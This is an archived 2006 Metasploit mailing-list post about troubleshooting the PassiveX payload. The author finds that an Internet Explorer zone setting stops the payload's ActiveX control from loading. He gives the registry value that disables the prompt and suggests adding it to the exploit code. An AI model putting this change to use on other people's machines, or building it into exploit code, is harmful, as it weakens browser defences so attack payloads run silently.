Metasploit mailing list archives

Using the PassiveX payload

From: featuremeister at googlemail.com (Feature Meister)
Date: Fri, 5 May 2006 18:18:44 +0200

Hi,

the dll does not get downloaded into %WINDIR%\Downloaded Program Files.
After some more troubleshooting and debugging (with process explorer)
I found out that the hidden IE is started with "...\iexplore.exe -new
http://192.168.71.75:8000/.
So I tried this one from a regular command line.
Result: IE prevented an ActiveX Control from being loaded and executed
automatically. Instead  I was presented with a pop-up and the usual IE
information bar.
I then looked at the security settings of Internet-Zone. Besides
"Automatic prompting for ActiveX controls" everythin was set so that
the control would execute without asking.
However the above setting was set to "Disable". I changed it to
"Enable" according to the helpful help dialog ;-) and tried it again:
it works!
The required setting in
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3 would be:

"2201"=dword:00000000

probably this could be added to the actual exploit code?

Cheers,

Marco

Current thread:

Using the PassiveX payload Feature Meister (May 04)
- Using the PassiveX payload mmiller at hick.org (May 04)
  - Using the PassiveX payload Feature Meister (May 05)
    - Using the PassiveX payload Feature Meister (May 05)
    - Using the PassiveX payload mmiller at hick.org (May 05)
    - Using the PassiveX payload Feature Meister (May 05)
    - Using the PassiveX payload mmiller at hick.org (May 05)